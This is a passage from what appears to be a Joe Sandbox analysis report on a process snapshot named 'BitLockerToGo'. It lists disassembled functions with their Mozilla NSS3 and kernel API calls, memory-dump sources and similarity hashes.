                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C691560: TlsGetValue.KERNEL32(00000000,?,6C660844,?), ref: 6C69157A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C691560: EnterCriticalSection.KERNEL32(?,?,?,6C660844,?), ref: 6C69158F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C691560: PR_Unlock.NSS3(?,?,?,?,6C660844,?), ref: 6C6915B2
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4188828017-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e56e8ebd8ef609ebd753a2d0c5bb033d08c72349438209baccf3198e31d8c229
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 50a7a2aadc3ec07b4044a26ac9cab359fbeec4d9e364bd42fa70231dc1cb2b20
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e56e8ebd8ef609ebd753a2d0c5bb033d08c72349438209baccf3198e31d8c229
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCA1C3B1D00205EBEF009F65DC41AEEBBB4EF49308F144135E90597B52E731E959CBAA
                                                                                                                                                                                                                                                                                                                                                          Function 6C662C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(#?fl,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23,?), ref: 6C662C62
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23,?), ref: 6C662C76
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23,?), ref: 6C662C86
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23,?), ref: 6C662C93
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23,?), ref: 6C662CC6
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23,?), ref: 6C662CDA
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23), ref: 6C662CEA
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C65E477,?,?,?,00000001,00000000,?), ref: 6C662CF7
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C65E477,?,?,?,00000001,00000000,?), ref: 6C662D4D
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C662D61
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6C662D71
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C662D7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                                                                                                                                          • String ID: #?fl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2446853827-3411516467
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7360fd23c25287b819042cb3dbece5e26113b47f77cee9a9d1e6d7c059398524
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 821a474005c1b4df32c1f1577426300cb057f82b6317196214a1c153af6a274d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7360fd23c25287b819042cb3dbece5e26113b47f77cee9a9d1e6d7c059398524
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D05104B6D00105ABEB009F25DC458AA77B8BF0A35CB148530ED1897B11EB31ED69C7EA
                                                                                                                                                                                                                                                                                                                                                          Function 6C6BAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6BADB1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE30: SECOID_FindOID_Util.NSS3(6C65311B,00000000,?,6C65311B,?), ref: 6C69BE44
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6BADF4
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6BAE08
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6BAE25
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C6BAE63
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C6BAE4D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: TlsGetValue.KERNEL32(?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4C97
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CB0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CC9
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6BAE93
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C6BAECC
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C6BAEDE
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C6BAEE6
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6BAEF5
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C6BAF16
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: da6ebd017df34267e2bfa4b42f4e147729979cb5e3ddd3298694ed5b3161a814
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2f56aebbac28e28117ed72b20332d194c5a7e274430846a28ccedee9f0b112d7
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da6ebd017df34267e2bfa4b42f4e147729979cb5e3ddd3298694ed5b3161a814
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C24107B1904310A7E7214A589C85BEF32A8AF4271CF500625F814A6F42F735DA6BC7DF
                                                                                                                                                                                                                                                                                                                                                          Function 6C75AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709890: TlsGetValue.KERNEL32(?,?,?,6C7097EB), ref: 6C70989E
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C75AF88
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C75AFCE
                                                                                                                                                                                                                                                                                                                                                          • PR_SetPollableEvent.NSS3(?), ref: 6C75AFD9
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C75AFEF
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_NOTIFY_CV.NSS3(?), ref: 6C75B00F
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C75B02F
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C75B070
                                                                                                                                                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C75B07B
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75B084
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C75B09B
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C75B0C4
                                                                                                                                                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C75B0F3
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75B0FC
                                                                                                                                                                                                                                                                                                                                                          • PR_JoinThread.NSS3(?), ref: 6C75B137
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75B140
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 235599594-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 42b899ac6eed09f02cbba64a8d81cd3622185f722418a41ca6ecdc544f5e4a0c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 489289e8b0f8f06f590a7f7b6df7043f7d1556bc592d1d6e060419fd135b80c3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42b899ac6eed09f02cbba64a8d81cd3622185f722418a41ca6ecdc544f5e4a0c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 129180B5A00601CFCB00DF15C988856BBF1FF4935876985B9D8195BB22EB32FC56CB91
                                                                                                                                                                                                                                                                                                                                                          Function 6C6D5CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C6D2A28,00000060,00000001), ref: 6C6D2BF0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C6D2A28,00000060,00000001), ref: 6C6D2C07
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D2BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C6D2A28,00000060,00000001), ref: 6C6D2C1E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D2BE0: free.MOZGLUE(?,00000000,00000000,?,6C6D2A28,00000060,00000001), ref: 6C6D2C4A
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5D0F
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5D4E
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5D62
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5D85
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5D99
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5DFA
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5E33
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C6D5E3E
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C6D5E47
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000,?,6C6D80C1), ref: 6C6D5E60
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C6DAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C6D5E78
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6D5EB9
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6D5EF0
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6D5F3D
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6D5F4B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4273776295-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e3bbdd5d4afcd2f20dcd87e22be82854ba1acbdde26f5f110bd42b124c052dcf
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f0c530ceda4be8c275462dfb0cafbb63e2219437ea480785f3ae7fe6e786a162
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3bbdd5d4afcd2f20dcd87e22be82854ba1acbdde26f5f110bd42b124c052dcf
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E71A1B5A00B019FD700DF24D884A92B7F5FF8A308F158529E85E87B11EB31F965CB99
                                                                                                                                                                                                                                                                                                                                                          Function 6C658DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?), ref: 6C658E22
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C658E36
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C658E4F
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,?,?,?), ref: 6C658E78
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C658E9B
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C658EAC
                                                                                                                                                                                                                                                                                                                                                          • PL_ArenaAllocate.NSS3(?,?), ref: 6C658EDE
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C658EF0
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C658F00
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C658F0E
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C658F39
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C658F4A
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C658F5B
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C658F72
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C658F82
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1569127702-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6754fcd0451570591f371d5e6bb4fd255c1678c6a0ed19bd4d33b8d56e8e31bd
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5ba3835e75a7633ed1b860c5f81eeffaed150afcb17d7aff7620ef59ed9a6114
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6754fcd0451570591f371d5e6bb4fd255c1678c6a0ed19bd4d33b8d56e8e31bd
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18513BB2E402059FD7009F68CC849AEB7B9EF49358F64452AEC089BB10EB31ED55C7D5
                                                                                                                                                                                                                                                                                                                                                          Function 6C750FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3(?), ref: 6C751000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C631A48), ref: 6C709BB3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C631A48), ref: 6C709BC8
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C751016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C751021
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C751046
